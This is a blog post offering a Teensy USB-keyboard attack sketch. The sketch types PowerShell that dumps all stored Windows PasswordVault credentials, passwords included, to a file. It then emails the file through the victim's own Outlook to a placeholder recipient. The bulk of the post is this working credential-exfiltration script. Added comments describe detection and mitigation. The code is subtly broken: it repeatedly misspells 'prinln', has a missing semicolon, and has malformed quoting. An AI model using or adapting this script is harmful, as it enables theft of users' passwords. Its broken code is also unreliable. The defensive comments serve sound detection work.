Teensy Script to Exfil Passwords Through Outlook

Using the previous post's CLI commands to reveal cached credentials, here is an additional implementation which will exfil the data through the user's own Outlook account.

Once plugged in, the Teensy will do the following:

  1. Launch an unelevated Powershell prompt (no administrative access required).
  2. Run a brief few lines of code to dump the security credential cache to a file in the %appdata% folder.
  3. Create an email and attach said file to it.
  4. Send the email

 

/*
 Author:         Davey Addison [ Secsi/@Supersafesecs ]
 Github:         github.com/Secsi
 Webby:          simpleinfosec.com
  
 Teensy Password Exfil Through Outlook 
 
 Script dumps passwords from Windows security credential store into a file and exfils the information on an Outlook attachment
 Issues: Email remains in sent items folder!!!
 
*/
// Status LED pin, defined only for Teensy builds (CORE_TEENSY). loop() below
// references LED_PIN unconditionally, so the sketch is Teensy-specific as written.
#if defined(CORE_TEENSY)
#define LED_PIN 6
#endif

/// Runs once after the board enumerates on the host as a USB HID keyboard.
/// Every Keyboard.* call below is a keystroke injected into whatever window has
/// focus on the host; nothing runs on the Teensy itself. From a defender's view the
/// observable events are therefore on the host: a new HID keyboard appearing
/// immediately before a PowerShell process starts, the PowerShell text itself
/// (captured by script-block logging, event 4104), a file written under %APPDATA%,
/// and an outbound mail with an attachment sent via Outlook COM automation.
void setup(){
 delay(1500);   // give the host time to finish enumerating the HID device
 posh();        // opens the Start menu and types "powershell" (see posh() below)
 // --- everything from here on is typed as PowerShell source into the host's prompt ---
 // Output file path under %APPDATA%.
 Keyboard.prinln("$path=$env:APPDATA+"\file.txt"");
 // Loads the WinRT PasswordVault type, then writes every stored credential, including
 // the password via RetrievePassword(), to $path. "PasswordVault" together with
 // "RetrievePassword" in a script block is a high-signal string to alert on.
 Keyboard.prinln("[void]");
 Keyboard.prinln("[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]");
 Keyboard.prinln("$vault = New-Object Windows.Security.Credentials.PasswordVault");
 Keyboard.prinln("$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > $path");
 // Outlook COM automation: the message goes out from the logged-in user's own mailbox,
 // so it looks like ordinary outbound mail with an attachment. Mail-flow/DLP rules on
 // attachments, and the copy left in Sent Items (noted in the header), are the evidence.
 Keyboard.prinln("Add-Type -Assembly 'Microsoft.Office.Interop.Outlook' -PassThru");
 Keyboard.prinln("$Outlook = New-Object -ComObject Outlook.Application");
 Keyboard.prinln("$Mail = $Outlook.CreateItem(0)");   // 0 = mail item, per the page's own usage
 Keyboard.prinln("$Mail.Recipients.Add('someone@somewhere.com')");
 Keyboard.prinln("$Mail.Subject='Data Extracted'");
 Keyboard.prinln("$Mail.Body = 'test email'");
 Keyboard.prinln("$Mail.Attachments.Add($path)");
 Keyboard.prinln("$Mail.Send()");
 // Closes the PowerShell window; the %APPDATA% file is not removed, so it stays on disk.
 Keyboard.println("exit")
}

/// Called repeatedly by the Arduino runtime once setup() has returned.
/// Toggles LED_PIN with 200 ms on / 200 ms off, i.e. a fast blink that signals
/// the keystroke sequence in setup() has finished. No further keystrokes are sent.
void loop(){
 // blink quickly when complete
 digitalWrite(LED_PIN, HIGH);
 delay(200);
 digitalWrite(LED_PIN, LOW);
 delay(200);
}

/// Opens the Windows Start menu with the right GUI (Windows) key and types
/// "powershell". Keyboard.send_now() transmits the current modifier/key state as one
/// HID report; the delay() values are fixed guesses at how long the host takes to
/// react. To the host this is indistinguishable from a person typing, which is why
/// USB device-control policies (HID allow-listing) are the primary mitigation, with
/// PowerShell logging and Constrained Language Mode as the host-side backstop.
void posh(){
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);   // press Right-Win
  Keyboard.send_now();
  delay(1000);
  Keyboard.set_modifier(0);                       // release Right-Win
  Keyboard.send_now();
  delay(1500);
  Keyboard.print("powershell");                   // presumably lands in the Start-menu search box
  Keyboard.set_modifier(0);                       // clear any residual modifier/key state
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(2000);
}

 

